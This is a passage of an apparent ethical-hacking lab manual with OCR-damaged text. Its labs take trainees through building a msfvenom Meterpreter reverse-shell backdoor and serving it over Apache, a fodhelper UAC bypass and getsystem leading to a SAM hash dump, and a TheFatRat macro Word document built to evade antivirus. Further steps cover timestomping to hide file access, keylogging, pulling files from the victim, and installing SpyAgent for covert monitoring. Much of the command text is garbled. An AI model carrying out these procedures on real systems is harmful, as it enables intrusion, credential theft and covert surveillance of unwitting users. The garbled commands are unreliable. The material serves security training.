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11, ‘The next step is to start the apache server 


Type the command service 


as | 


FIGURE 6: String Apache меген 


12, Now that the apache web server is running, copy Exploit.exe file into the 
sharo folder. 


13. Type the command ер root/Desktop/Exploit.exe ivariwwwihtmlishare! 


Сото run the in the terminal, and press Enter. 
‘apache wob zn - 
server use the ems 
command: 
cpiroot.msf4/data/ at 
exploits" uns ЖОЖ 
ariwrerwilsharol 
FIGURE Copping е plea luci Ве 
ETTE] 14. Type msfconsole in the terminal and press Enter 
Perform. roctikali: ~ $ 8 6 


rie Ear Vew Search Terminal Hep 


FIGURE 63 Taunehing msfeonsole 
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15. Type use exploitimultimandier and press Enter, to handle exploits 
launched outside the framework. 


16. Now issue the following commands in msfeonsole: 
a) Type set payload windowsimeterpreter/reverse tcp and press 
Enter. 
b) Туре set LHOST 10.10.10.11 and press Enter. 
~— - NE өө о 
ie Edt View Sench Terminal Hep 
[^ € ( T 19.10.19. 


ICIS 610% Canin the ayo ant xp 
17. То start the handler, type the command exploit 4 -z and press Enter 
[m о] 
ie rat View 5 
1610.1 
Exploit running 
FIGURE 61: Exploit he windows темне 
TFET 18. Now, switch to Windows 10 virtual machine. 
Run tho 19. Launch Chrome. Type thc URL http:/110.10.10.11/share/ in the address 
Exploit. bar, and press enter. 


Note: Here 10.10.10.14 is the IP address of Kal 
your lab environment. 


20. You will be redirected to the apache index webpage. Click Exploit.exe 
link to download the backdoor file. 


inux, which may vary in 


Index of share 
FIGURE 612: Dining — 
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21. Once the file is downloaded navigate to the download location of the 
browser and double-click Explaitexe file to execute. In this lab the 
default location is Downloads folder. 


mu — 
Lit you didn't i: 1 
[riae pag FIGURE 61: Seite dc fle 
Installed, run apt- a 
get install 22. Ifan Open File - Security Warning window appears, click Run. 
мыз 23, Leave the Windows machine running, so that Exploit.exe file runs in 
background, and now switch to Kall Linux machine. 
"] 
к —————— 
ото interact pegas 
Drea се | 
[есе нимо в» m maro jet 
= | 
| 
24. Switch back to the Kali Linux machine. Meterpreter session has been 
successfully opened, as shown in the following screenshot: 
REET 3 
FIGURE GIS: Meee m 
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25, Туре sessions 4 1 and press Enter (1 in sessions -i 1 command is the id 
umber of the session). Meterpreter shell is launched, as shown in the 
Establish а following scrcenshot: 
Session 


Tela: - ore 


re tot view Search | 


нар 


FIGURE 16 Манро Sein Launcha 


26. Туре getuid and press Enter. This displays the current user ID, as shown 
in the following screenshot: 


LI soa] 
| 


nie а View Such Terminit Help 


15 
=1 free 


27. You will observe that the Meterpreter server is running with normal user 
privileges. 
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28, You will not be able to execute commands (such as hashdump, which 
dumps the user account hashes located in the SAM file; elearev, which 
clears the event logs remotely; etc) that requires administrative/root 
privileges. 

29. Let us check — this by executing the rum 
post/windowsigatherismart hashdump command: 


30. "The command fails to dump the hashes from the SAM file located in 
Windows 10 and returns an error stating that Insufficient Privileges to 
dump hashes, 


31. From this, it is evident that Meterpreter server requires admin privileges 
ло perform such actions. 


32. Now, we shall try to escalate the privileges by issuing а geteystem 
command that attempts to elevate the user privileges. 


33. The command issued is: 


a. getsystem -t 1: which uses the Service - Named Pipe 
Impetsoration (In Memory/ Admini) Technique 


FIGURE G19 Trying gesti Command 


34, The command fails to escalate privileges and returns an error stating 
Access is denied. 


35. From the above result, it is evident that the security configuration of the 
Windows 10 machine is blocking you from gaining unrestricted access to 


36. Now, we shall tty to bypass the user account control setting that is 
blocking you from gaining unrestricted access to the machine. 


37. You will now: 
Move the cutrent meterpreter session to the background, 
b. use the bypassuac fodhelper exploit for windows, 
set motorprotorirovorso tcp payload, 


configure the exploit and payload, 


exploit the machine using the above configured payload in an artempt 
to elevate the privileges. 
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38. Type background and press Enter. This command moves the current 
meterpreter session to the background. 


FIGURE 620: Bc grunding the Sion 
39. Type use exploitiwindows/local/bypassuac.fodhelper and press Enter. 


40. Here, you need to configure the exploit To know which options you need 
to configure in the exploit, type show options and press Enter. 


—€—— 
etting Required Description 


41. The Module options section appears, displaying the requirement for the 
exploit. 

42, You will observe that, the SESSION option is required, but the current 
setting is empty. 


43, Туре set SESSION 4 (1 is the current meterpreter session which was in 
the background in this lab) and press Enter. 


44. Now that we have configured the exploit, our next step will be to set a 
payload and configure it. 
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45. ‘Type set payload windows/meterpreterireverse top and press Enter 10 
set the metorprotorirovorso. tcp payload. 


46. The next step is to configure this payload. To know all the options, you 
need to configure in the exploit, type show options and press Enter. 


FIGURE 629 Sening the Porn 


47. The Modulo options section appears, displaying the previously 
configured exploit. Here, you can observe that the session value is set. 


48, The Payload options section displays the requirement for the payload, 
49. Observe that: 


a. LHOST option is required, but the current setting is empty. Here, 
you need to set the IP Address of the local host ie, Kali Linux. 


b, EXITFUNC option is required but the current setting is already setto 
process, so ignore this option. 


c. LPORT option is required but the currant sotting is already set to 
port number 4444, so ignore this option. 


50. To set the LHOST option, type set LHOST 10.10.10.11 and press Ent 
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51. To set the TARGET option, type set TARGET 0 and press Enter. Here 
Gis nothing but Exploit Target ID. 


Note; In this lab, 10.10.10.44 is the IP Address of attacker machine (Lc., Kalî 
Linux), which might vary in your lab environment. 


52, You have successfully configured the exploit and payload. Type exploit 
and press Enter. This begins to exploit the UAC settings in Windows 10 
machine. 


53. As you can see, BypassUAC exploit has successfully bypassed the UAC 
setting on the Windows 10 machine; you have now successfully attained 
a meterpreter session, 


z "т ry 


FIGURE 625: Массе Scion Opened 
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54, Now, let us check the current User ID status of meterpreter by issuing 
the getuid command. You will observe that Metespreter server is still 
running with normal user privileges. 


FIGURE 62 Viewing he Cumont Veer 1D 


55. At this stage, we shall re-issue the getsystem command with the - 1 
switch, in an attempt to elevate privileges. 


56. Туре getsystem -t 4 and press Enter. 


57. This time, the command has successfully escalated user privileges and 
retums a message stating got system, as shown in the following 
screenshot: 


FIGURE 627 ing eye Comme 


58. Now, type getuld and press Enter. The meterpreter session is now 
running with SYSTEM privileges (NT AUTHORITYISYSTEM), as shown 
in the screenshot: 


59. Let us check if we have successfully attained the SYSTEM/admin 
privileges by issuing a metespreter command that requires these privileges 
in order to be executed 


60. For instance, we shall try to obtain hashes located in the SAM file of 
Windows 10, 
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61. Type the command rum postiwindowsigatherlsmart hashdump and 
press Enter. This time, meterpreter successfully extracted the NTLM 
hashes and displayed them as shown in the following screenshot: 


FIGURE 629 Dumping the Haber 
62, Thus, you have successfully escalated privileges by exploiting the 


Windows 10 machine's vulnerabilities. 


63, You can now execute commands (clearev, which clears the event logs 
remotely, etc) that require administrative/root privileges 


Lab Analysis 
Analyze and document the results related to this lab exercise. Provide your opinion of 
your target's security posture and exposure through public and free information. 


LEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 


RELATED TO THIS LAB 


temet Connection Required 


O Yes М No | 


Platform Supported 
EI Classroom 
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Hacking Windows Server 2012 
with a Malicious Office Document 
using TheFatRat 

Telit isan офі tol alio caps radere nith рори родай and ten the apad 


тайыл can be exeaded on nindavs android тас. 
Lab Scenario 
PO valable. " ай & 
полтава Social Engineering is one of the most typically used attacks by a hacker. As the recent 
ES trends suggest, many big organizations fall victim to this attack vector. The attackers 
ОО ioe tick the staff of a workplace to click links in a legitimate looking document which 
- ‘tums out to be malicious and even able to evade the anti-virus programmes. 
Web ение 


In this lab we shall find out how to create а malicious office document and get a 
ED оңоо review | meterpreter shell by bypassing anti-virus systems. 


Lab Objectives 
"The objective of this lab is to help students learn: 
* How to use an office document to exploit a windows machine? 


Lab Environment 
тона A 
demonstrated in To сату out this ab, you need: 
is lah are oA iter. ing Windows Server 2016 
= computer sunning э Server 
ZACEH- + Kali Linux running as a virtual machine 
Тоом\сЕНУ10 + Windows Server 2012 running as a virtual machine 
Module 06 System 
Macking Lab Duration 

‘Time: 15 Minutes. 
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Overview of TheFatRat 


"The FatRat provides an easy way to create backdoors and payloads which can bypass 
most anti-virus systems, 


Lab Tasks 


-ETTI 1. Log into the Кай Linux machine and open a Terminal window. Туре git 
агаг clone httpsz/github.com/Screetsec/TheFatRat and hit Enter. 


‘Set Up TheFatRat. 
Note: TheFatRat is already preinstalled in the Kali Linux machine, you can 
skip to step 8, 


TRG $ 6 6 


FIGURE Cnn hf i wba 


2, After the doning is completed, type ed TheFatRat! and hit Enter, 


тит 57570] 
ie cat vew sema Temni нар 
EEE 1 


files: 180% (9091/98: 


3, Type chmod -R 755 /root'TheFatRat and hit Enter as shown in the 
screenshot, 


төлөш керий $ 6 6| 
ре Et View Сем Tema Hel 


GUHIT Capi det peine 
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4. ‘Type Jsetup.sh and hit Enter to begin the installation as shown in the 
screenshot, 


а $ 6 9| 


5. An UPDATING KALI REPO popup appears as shown in the screenshot. Let it 
finish updating the kali packages. 
IE UPDATING KALI REPO JE 960 


FIGURE 7S Србе po windo 


6. After the update window doses, TheFatRat asks to create a shortcut in the 
system. Туре y and hit Enter. 


Cedar FES $86 
Tie Eat View Search Татты Hele 
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7. A Warming appears as shown in the screenshot. Hit Enter to continue 


EIS 960 
rie Edi View Search Terminal Help 


FIGURE 17 Wassing menage gien by TF M: 


ETT 8. After theinstallation is complete, in the Terminal window type fatrat acd hit 
mre Enter. 


File TOG FFE $ 6 6| 
ie kat Vew Senen Temi Heip 
FIGURE 7A Tac Sento 
TER Tak Maal бе Teal acing end Cooremeaeure Серук ls RE Erme 
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9. FatRat launches and starts to verify the installed dependencies as shown in 
the screenshot 


[ED gg ‘| 


rie rar View Seren Temm Help 


FIGURE асаа de rds 
10. Service Running messages comes on the screen as shown in the screenshot. 
Press Enter to continue. 


11, You will get multiple prompts saying press Enter to continue, do so to 
continue. 


7 


[ris Eat Vew Seach Tembal_ Heip 
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12. TheFatRat menu comes as shown in the screenshot. Choose [06] Create Fud 
Backdoor 1000% with PwriWinds [Excelent] by typing 6 in the menu and 
hit Enter. 


Тоа =) thera 


ре Ейс Vew Search Terminai Help 


FIGURE: T Dea 
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13, PwnWinds menu appears as shown in the screenshot. Choose [3] Create exe 
file with apache * Powershell (FUD 100%) by typing 3 in the menu and hit 


Total - 


Search Terminal Help 


FIGURE три 


14. Type 10.10.10.14 in the Set LHOST IP option and hit Enter. 
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15, In the Set LPORT option, type 4444 and hit Enter. 


один 


16, Туре payload in ‘Please entor the base name for output files’ option and 
hit Enter as shown in the Screenshot. 


17, In the Choose Payload оро choos [ 3 1 
windowsimeterpreterireverse tcp by typing 3 and hit Enter, 


FIGURE Che palam opion 
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18, The FatRat generates а payload exe file located at Home/TheFatRatioutput. 


as shown in the screenshot. 
tpe 
us sud = E 
Фома 
АСОВЕ донете it 
ET 19, Now to gp back to main menu choose [8] Back to menu by typing 8 and hit 
pee rec Enter. 
Make Malicious 
Word File ткы тераа: 08 
Tie Edt View Search Terminal Help 
FIGURE 7.18: Going back he la mes 
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20, From the menu, choose [07] Create Backdoor For Office with Microsploit. 
by typing 7 and hit Entor as shown in the screenshot. 


тоок: -Mhe FaR 
rie Eok View Seach Terminal Help 
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21. Mictosploit menu appears; choose option [2| The Microsoft Office Macro on 
Windows by typing 2 and hit Enter. 


ТЕ $ 6] 


Tema Нер 


Fle Ed View Seach 


HOUR 720 Mamita mena 


22, ‘Type 10.40.40.11 in the Set LHOST IP option and hit Enter. 


23. In the Set LPORT option, type 4444 and hit Enter. 


FIGURE 122 Sep option 
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24, ‘Type BadDoc in the Enter the base name for output files option and hit 
Enter as shown in the Screenshot. 


FIGURE 725 Eater uq ase 


25, In Enter the message for the document body (ENTER = default): type you 
have been hacked! and hit Enter. 


724 Later ames fordosanent bady 
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26, In Are u want Use custom exe file backdoor (yin) option type y and hit 
Enter 


27, Туре lrootiTheFatRatioutput/payload.exe as Path and hit Enter. 


наил Speci pu in 


28 Tn the — Choose Район opion, choos [ 3 1 
Windowsimeterpreterireverse tep by typing 3 and hit Enter. 


root/Theratiat/output/paytoad.exe li 


FIGURE27 Cree piskad pi 
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29, "The malicious document details appear as shown in the screenshot, Hit Enter 
to continue, 


FIGURE 728 Hadkdoo ed prompt 


30, Navigate to Home/TheFatRatioutput to find the generated word file as 
shown in the screenshot. 


How 


cm README nd пў 
г Doce i= аза an 
O отне ] 
FIGURE 729: Word le occu cad 
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31. Open another terminal window and launch metasploit by typing msfeonsole 
B rasna and hit Enter, 


Set Upa Listener ешт v 5 


Edt Vew Seach Terminal Hei 


1 1682 exploits - 964 auxiliary 
498 payloads - 40 encoders 
eus plait Pro trial yup 1 


1 
1 
1 


ттүү 


32. Wait for metasploit to start. Then type use mult/handler in the msf 
command line and hit Enter. 


78 $ 6 6| 


е Ear уке search Temi Hep 


FIGURE 7.3 Ser ранне 


33. Type set payload windowsmeterperterreverse tep and hit Enter as 
shown in the screenshot. 


Edt View Seach Terminal Нер 


58 oo | 


FIGURE TAA Ser paplan fir he нее 
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34, Туре set LHOST 10.10.10.11 and hit Enter, type set LPORT 4444 and hit 
Enter and finally type show options and hit Enter. 


8 8 8 6| 
не ың Vw seach Temm Hel 


tting А Descriptior 


Technique (Acces 


FIGURE? 3 Lineneropions 


35, Now type run and hit Enter to start the listener, 


E RATE 36. Now open another terminal window and type ер 
ne iroot/ThoFatRatioutput/BadDoc.docm lvariwwwihtmlshare/ and hit Enter. 
Malicious 


Document File 


eFathat/output/BadDoc.docn /Var/www/htel/ share 
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37. Then type service apache? start and hit Enter. 


Festival $66 


Fle tdt View Search Terminal Help 


38. Now switch to Windows Server 2012 system and open a browser (here 
Internet Explorer). 


39, In the address bas type http2/40.10.10.44/share) as the URL and hit Enter. 
40, Index of /share page appears, click BadDocdocm to download it 


ETT 41. Click Save in the download prompt as shown in the screenshot. 

Open the 

d. TM) 

Document Index of /share 

Nam Laimebi Sve Dawson 
perem 
КЕЕ 
—— 
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42. Open your Downloads folder and double dick the werd file downloaded in 
the previous step. 


© + S 3 DX ETT 


тз Dre 
pre 
prem 


emere 


IG URE 734 Поет бала won! document 


43. MS Word opens the file in Protected View. Click Enable Editing as shown in 
the screenshot. 


CO) 


FIGURE 739 Tiebie ciiig upian in MSWord 


CEH Lab Manoa! Pap 2З [Ethical Hacking and Countermemures Copri © bs АСИЯ 
Res Reserved Reprod ion Stil Probl. 


Module 0б- System Hacking 


44, A Security Warning appears, click Enable Content as shown in the 


(| ce 1 aembcer| Aambect Aat 


E SORT WAC ters ue tli 3 


etention This document was coated by a newer version af Microsoft Of 
‘Macros mast be enabled za display the contents of the document. 


ST 


FIGURE 14 adicit gti 


45. Now if you switch back to the Кай Linux system, you will ind that we have 
а Meterpreter session open end in the metasploit terminal 


FIGURE 74IeMerpsexeion obtina 


46. ‘Type Sessions 4 and hit Enter to scc all the active sessions as shown in the 
screenshot, 


neverpreter x8 Ceinghdmant sere — J—— 
10.10.19.1 1.18.18.12) 


BUNE 742 Viewing бе ceded sein D 
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47. Туре sessions -14 and hit Enter to get a meterpreter command line as shown 
in he screenshot. 


IGURE 7% Cammenga he maetprdersasion 


-Eik 48 Type sysinfo and hit Enter to view the system details of the exploited 
gen computer as shown in the screenshot. 

View Exploited 

‘System Details 


Lab Analysis 


Analyze and document the results related 10 the lab exercise, 


ASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB 


Internet Connection Required 


О Yes М No 
Platform Supported 
FI Classroom Wl iLabs 
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available in 
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Hacking Windows 10 using 
Metasploit and Post-Exploitation 
using Meterpreter 


Metasploit Framework is a tool for developing and executing exphit code against a 
remote target machine 


Lab Scenario 


Backdoors arc malicious files that contain Trojan or other infectious applications 
that can either halt the current working state of a target machine or even gain 
partial/complete control over it. Attackers build such backdoors in attempt to 
gain remote access to the victim machines. They send these backdoors through 
‘email, file-sharing web applications, shated network drives, among others, and 
entice the users to execute them. Once а user executes such application, an 
attacker can gain access to his/her affected machine and pesform activities such 
as keylogging, sensitive data extraction, and so on, which can incur severe damage 
to the affected user. 


Lab Objectives 
‘The objective of this lab is to help students learn to detect Trojan and backdoor 
attacks. 
"The objectives of this lab include: 
= Creating a server and testing the network for attack 
= Attacking a network using a sample backdoor and monitor system activity 
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Lab Environment 
To catry this out, you need: 
* Kali Linux running in Virtual machine 
= Windows 10 running in virtual machine (Victim machine) 
= A web browser with Internet access 
= Administrative privileges to sun tools. 
Lab Duration 
‘Time: 20 Minutes 
Overview of the Lab 
‘Trojan is a program that contains a malicious or harmful code inside apparently 


harmless programming or data in such a way that it can get control and cause 
damage, such as ruining the file allocation table on a hard drive. 


Lab Tasks 
Note: Make sure to disable Windows SmartScreen and Windows Dofondor in 
Windows 10 
Cimetaspioit 1, Before beginning this lab, create a text file named secretxt on the 
Framework laa Windows 10 virtual machine; write something in it, and save it in the 
too! for developing location €:1UsersiAdmin\Downloads. 
and executing 
‘exploit code 2, In this lab, the seerettxt file contains the text “My credit card account 
against a remote. number is 123456789.” 


Ex e Doon 


P 
pe 


TTA TT 


me 
FIGURKA: Ter бесинши алии ане 
TE 3, Log in to Kali Linux virtual machine 
rem 4, Launch а Command line terminal 
Backdoor.exe File 
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5, Туре the command msfvenom -p windowsimeterpreter/reverse tcp — 
platform windows -a x86 е x86/shikataga паї -b "x00" 
LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe and press Enter. 


8 $8 
ie Eat ew search Tema нар 


FIGURE &2 Сена Pal 


6. This creates a backdoor on the Desktop. 


FIGURE 83 Blond Geta 


7, Now you need to share Baekdoor.exe with the victim machine (in this 
lab, Windows 10 is the victim machine). 

8, To share the file, you need to start the apache server. Type the command 
service apacho2 start in Terminal, and press Enter. 


7а $86 


ре zar Мен sewn Temea нер 


9. Now the apache web server is running, copy Backdoorexe into the 
share folder. 
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10. Туре cp /rootDesktop/ Backdoor.exe /variwwwihtmi/share! and press 


Entor, 
журун 79 oe 
acing wid ue ып vew Search Temi 
server use the 
following 
command: 
cpiroot.mstaidatai 
exploits!” 
Nartwwwishare! 
FIGURE KS Copying the backdoor fle 
11. Now, type the command msteonsole and press Enter to launch 
msfconsole. 
12. Туре use exploitimultihandler and press Enter, to handle exploits 
launched outside the framework. 
ECS Seo) 
[pie Eat View Search ГИТ! 
ED ааыа 


p 
pns 


EH oec re FIGURE Rf Борй the viti machine 

sche disi coms 

reta 

i 
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13, Now, issue the following commands in msfeonsole: 


2) Type set payload 
Enter. 


lowsimeterproterireverse_tep and press 


b) Туре set LHOST 40.10.10.11 and press Enter. 


Q Туре show options and press Enter. This lets you know the 
listening port 


14. То start the handler, type exploit jz and press Enter. 


FIGURE 84: Esplo he windows А machine 
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Backdoor File 


Lit you diane 
have apache2 
installed, run apt- 
get install 
apache2 
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15. Log on to the Windows 10 virtual machine. 


16, Launch Firefox or any web browses, and type http:/10.10.10.11/share/ 
in the URL fidd, then press Enter. 


Note:10,40.10.414 is the IP address of Кай Linux, which may vary in your 
lab environment, 


17. Click the Backdoor.exe link to download the backdoor file, 


Carmem 


FIGURE 89: Firefox web brosser witi Ваа оос еле 
18. The Opening Backdoor.exe pop-up appears; click Save File. 


Note: Make sure both the Backdoorexe and secret.tet files are in the 
same directory. 


Opening Backdoor exe 


You have chosen to open: 
[E] Backdoorexe 


which is Binary File (72.1 KB) 
from: hitp://10:10.10.11 


Would you like to save this file? 


FIGURE AA: Saving the Вайне fle 


19. By default, this file is stored in CAUSers\Admin\Downtoads. 
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20. On completion of download, a download notification appears in the 
browser. Click Open Containing Folder. 


mm T 
ОЕТ = 
CERES 

Index of /share 


Some Ludi Бирена 


FIGURE Bt Sasing he Backdvoreve fie 
21. Double-click Backdoor.exe. If an Open File - Security Warning 
appears, click Run. 


22. Switch back to the Kali Linux machine, Meterpreter session has been 
successfully opened as shown in the following screenshot: 


) > exptoit -J -2 
а job o. 


FIGURE 812 Exp euh af iduvr 10 suche 
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and press Enter to view the active sessions. 


Ре ык Vew Seach 


78 
итш Help 


FIGURE 4.13: Eaplat enit of edb. machine 


24, Type sessions -i 4 and press Enter (1 in sessions -i 1 command is the 
id number of the session). Meterpreter shell is launched, as shown in 
the following screenshot: 


rue tat Vew sert 
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25. Туре sysinfo and press Enter. Issuing this command displays target 
machine information such as computer name, operating system, and so 


58 969 


Fie кк View Sench Terminal Help 


IGURE 1З Viewing stom into 


26. Type ipconfig and press Enter. This displays the victim machine's IP 
address, MAC address, and so on. 


p $69 


FIGURE RAG: IP adden related information 
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27. Туре getuid and press Enter. 


28, Running getuid will display the attacker that the Meterpreter server is 
running as administrator on the host 


FIGURE KI Viewing the server usmame 


TASK & оу Type pud and press Bater to view the cuntent working directory ox the 


List all the Files in remote (target) machine. 


арак] Note: The current working directory will differ according to where you 
have saved the Backdoorexe file, therefore the screenshots might differ 
in your lab environment. 
8 57575 
FIGURE A йр бе ret wang ане) (унд) 
30. Type Is and press Enter to list the files in the current working directory 
Note: The screenshots might differ in your lab environment. 
REET 5579 
at Мен Seach тат Нар | 
LIE 31. To read the contents ofa text file, type cat filename.txt (here, secrat.txt) 
arc and press Enter. 
Viewthe ч mod mE 
Contents of a Filo Tet 
ish Vw Suh Temna Мер 
x moitie 
FIGURI BA laming est comen 
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32. Change the MACE attributes of secret.exe. 
Mrask 6 


33. While performing post exploitation activities, a hacker tries to access fles 
View the MACE to read their contents. Upon doing so, the MACE attributes change 
маме immediately, which gives an indication to the file user/owner that 
someone has read or modified the information 
34. To leave no hint of these MACE attributes, use the times to mp command 
to change the attributes as you wish after accessing file, 


35. To view the mace attributes of secret.txt, type timestomp secret.txt -v 
and press Enter. This displays the created time, accessed time, modified 
time, and entry modified time, as shown in the sereenshot: 


FIGURE 8:21: Viewing the stomp information 


FPES 36. "The ed command changes the present working directory. As you know, 
есес the current working directory is C:UserstStudentDownloads, 


Change the 
Present Working 37. Туре ed Са to change the current remote directory to 
Directory (PWD) a 
TO e sme e zr 
Files in the. - - 
Changed 
Directory 
AGU 22: Changin the puth of he cry 
38. Now type pwd and press Enter, 
39. Observe that the current remote directory has changed to €x. 
тшт € € | 
rie tat View Semch Tevin Нар 
FIGURE: A2: Check the preset wining бесеу [лб 
EH ab Mama) буе Tic Hacking and Goumencanures Copy © by fame 
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40. Туре Is and press Enter to list the files in the current working directory 


SS Suse ра 5 


41. The download command downloads a file from the remote machine. 


mr 


Type download filename.extension (in this lab, dotnetfx.exe) and 
press Enter. 


Download a Filo 


[ie Cat Wew semen Temi 


FIGURE 825 Downloading fle 
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43, The downloaded fle is stored in the Home Folder by default, Click 
Places, and click Home. 


FIGURE кай Browsing he Home Folder 


44. The downloaded file is available in the home folder as shown in the 
following screenshot 


T 
O feet ГЕ ЕЕЕ HM 


Т 


9 


ae 


FIGURE & 27; очо йе all inthe Haie decry 


45. The search command helps you locate files on the victim machine. The 


command is capable of searching through the whole system ot specific 
folders. 


46. Туре search -f “filename ext" (here pagefile.sys) aud press Enter. 
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47. Туре keyscan start and press Enter. This starts capturing all keyboard 


Erase input from the victim system. 
Log all the Koy 
Tug $8 6 
FIGURE A28: Caping kerban ipit 
48. Switch back to the Windows 10 machine, create a text file and start 
typing something. 
FIGURE KAO Peening leprae skin 
49. Switch to the Kali Linux machine, Туре keysean_dump and press 
Enter. This dumps all the keystrokes. 
iE == 
FIGURE ASN: Deg eet 
50, Туре idtetime and press Enter 
51, Issuing this command displays the number of seconds for which the 
user has been idle on the remote system. 
табыт oe 3) 
FIGURE 832 Vevirg бе е ine 
y shutdown the victim machine after performing post 
exploitation. 
GH Tab Maral Pag 5 ical cog i хтети Cora Oi aa 
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53, Туре shutdown and press Enter. This shuts down the victim machine. 


[e 57576] 


ER View Senh Temis Hiie 


cours 10 is tumed ой 


FIGURE НЯ Маца mucha successfully ut dowa 


Lab Analysis 


Analyze and document the results related to this lab exercise. Provide your opinion of 
your target's security posture and exposure through public and free information. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE 
RELATED TO THIS LAB. 


Intemet Connection Required 


DO Yes E No 
Platform Supported 
EI Classroom H iLabs 
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User System Monitoring and 
Surveillance using Spytech 


SpyAgent 


Spytech SpyAgent is a powerful computer spy software that allows you to monitor 
everything users do on а computer—in total stealth. SpyAgent provides a large array 
of essential computer monitoring features, as well as website, application, and hat- 
client blocking, lockdown scheduling, and remote delivery of logs via email or FTP. 
Lab Scenario 

"Today, employees are given access to a wide array of electronic communication 
equipment. Email, instant messaging, global positioning systems, telephone systems, 
and video cameras have given employers new ways to monitor the conduct and 
performance of their employees. Many employees are provided with а laptop 
computer and mobile phone they can take home and use for business outside the 
workplace. Whether an employee can reasonably expect privacy when using such 
company-supplied equipment depends, in large part, on the security policy the 
employer has pur in place and made known to employees. 

In this lab, we explain the process of monitoring employce activites using Spytech 
SpyAgent: 


Lab Objectives 


"The objective of this lab is to help students use Spytech and SpyAgent. After 
completing this lab, students will be able тох 


= Installand configure Spytech SpyAgent in а victim machine 
= Monitor keystrokes typed, websites visited and Internet Traffic Data 


CER Lab Mana Bag 


кысы Hacking and Countermeasures Сорун! © b Eb cl 
AV hes Reserva. Аорта п те}; Probe. 


‘Module 06- System Hacking 


Lab Environment 
‘To perform this lab, you need: 
= A computer running Windows Server 2016 
= Run this tool in Windows Server 2012(victim machine) 
+ Or, download Spytech SpyAgent at httpsiwww.spytech- 
web.com/spyagent.shtml 
= Ifyou wish to download the latest version, screenshots may differ 
= Administrative privileges to install and run tools 


Lab Duration 
‘Time: 15 Minutes 


Overview of the Lab 


‘This lab demonstrates to students how to establish remote desktop connection with 
a victim machine and run а spying application named SpyAgent to secretly track user 
es 


1, This lab works only if the target machine is Turned ON, 


2, Since you have seen how to escalate privileges in the earlier lab (Escalating 
Privileges by Exploiting Client Side Vulnerabilities), you will use the same 
technique to escalate privileges and then dump the password hashes. 

3, On obtaining the hashes, you will use password cracking application such as 
RainbowCrick to obtain plain-text passwords. 


4, Once you have the passwords handy, you will establish a Remote Desktop 
Connection as an attacker, install Spytech SpyAgen and leave it in stealth 
mode. 


Note: In this lb, you atc connecting remotely to Windows server 2012 virtual 
machine. You can establish remote connection only for а user account that has 
administrative privileges (here, Jason user account has administrative privileges, 
so we shall be logging in to i) 


5, The next task would be to log on to virtual machine as a legitimate user (here 
you) and perform user activities without being aware of the application 
tracking your activities in background. 

6, Once done, you will again establish a Remote Desktop Connection as an 

attacker, bring the application out of stealth mode, and monitor the activities 

performed on the virtual machine by the victim (you). 
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Lab Tasks 


— Eras 1 1, Lopintothe Windows Server 2016 machine and click the Search icon from 
Establish a the taskbar. 

Remote Desktop 5 
Connection Start typing to search for 


apps, fles, and settings 


e mH 


FIGURE Sekering Sean 
2. In the Search field, search for Remote Desktop Connection. 
3. Click Remote Desktop Connection in the Search results. 


FIGURE Sending br Вата Desktop Connecti 
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4. The Remote Desktop Connection window opens. Enter the IP address of 
Windows Server 2012 (in this lab, 10.10.10.12, which might differ in your 
lab environment) in the Computer fidd, and click Show Options. 


© Remate Desktop Connection 


A. Remote Desktop 
» Connection 


Username: None єресей 
You wil be asked for credertiale when you connect. 


FIGURE 93: Ld amore Deg Connon 
5, Enter a username granted administrative privileges (bere, Jason), and click 


Connect. 
¥ Remote Desktop Connection = ES 
| Remote Desktop 
29 Connection 


Gener Display Local Resouces Eperence Advanced 


Logon settings 
ШЦ Perte rane othe remate computer. 


n 


‘You wil be asked for credentials when you connect. 


[O Aow me to save crederii 


eT 
D — —— 
a =т= 


Save Save Ae Open. 


FIGURE 94 Fair Rarene Des Consec 
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6. ‘The host machine tries to establish а Remote connection with the target 
machine, 


7. A Windows Security pop-up appears; enter the password (qwerty) and click 
ок. 


Кеч 


Enter your credentials. 


These credentials wil be used to connect to 10101012. 
Ө” 
ry 
‘SERVER2016Vason 


[Г] Remember me 


More choices 


FIGURES Winky ppp 
8. А Remote Desktop Connection window appears; dick Yes. 


5 Remote Desktop Connection x 


The remote computer could not be authenticated due to probleme wth ts 
securty сейде may be unsafe to proceed 


Cothoaenane 

Lg] Name inthe cetficate from the remote computer: 
WINOJAQTOJBPAICEH com 

Cetficae eros 


Thefoloweg enor were ercourtered whe valdating the remate 
computers сепсе 


|B. те canente a not tom states ces пону 


Do you want to connect despte these cetiicate ears? 


[C] Dont ask me again for connections to this computer 


[a 


FIGURE 96 Reese Dei кесди wb 
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Note: You cannot access а Remote Desktop Connection if the target machine is 
shut down. Remote Desktop Connection is possible only if the machine is in 


turned ОМ. 
9. A Remote Desktop connection is successfully established, as shown in the 
screenshot: 


[rr 
[ge 


nTUmm——— 


10. Gose the Server Manager window. 


ETT 11, Navigate to ZACEH-ToolsICEHV1O Module 06 System 
CEA Hacking SpywarelGeneral Spyware\Spytech SpyAgent and double-click 
Install Spytech Setup (password=spytoch).exe. 
SpyAgent. 


РЕЯ 
не E тишли ea 
toms Я 
Mieres намазкана. 
тык eS 
DELE 
Р 
p 
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12. If the Cannot access network resource dialog-box appears, enter the 
credentials of the Windows Server 2016 machine, and click OK. 


Cannot access network resource 


EB ламата 
роп as Spy gent ө 
som a monii 
mode when iti oper 
‘cl foe тшу 
Saring i maig 


FIGURE 99; —M 


13, The Spytech SpyAgent Setup window appears; click Next. 


SpyAgent 


Computer Monitoring and Activity Recording Software 


FIGURE букв SpA Sep dw 
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14. The Welcome wizard of Spytech SpyAgent Setup program window 
appears; read the instructions and click Next. 


Welcome othe Scitech SeyAgent Seu pogan. This rogum lita 
Spytech 5руйдеп on jour computer 


NOTICE TO ANTIVIRUS USERS 
Sent iso corper montage erus sol tons wll 
dag ar perta hand Pono arbon бий км ate өн 
ire Sow Бкілат mcn a истей те ed 
alien 


Tick Nest ia conie vith he Sel program. 


WARMING. а рода ie palecie by erp law antera 
pem 


Unsure обоо debut of hs program or any porton of 
тарзы r sever cl ard cina rerabes ard wd be рге ва 0 
e manman den possi ure lane 


GUIS: Wekome wert 
15, The Important Notes wizatd appears; read the note and click Next, 


[Smet can be an on Windows sui active тойот mode 


Ez 


FIGURE A2: Imara Nes wi! 
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46 "The Software License Agreement window appears, you need to accept the 
agreement to install Spytech SpyAgent. 
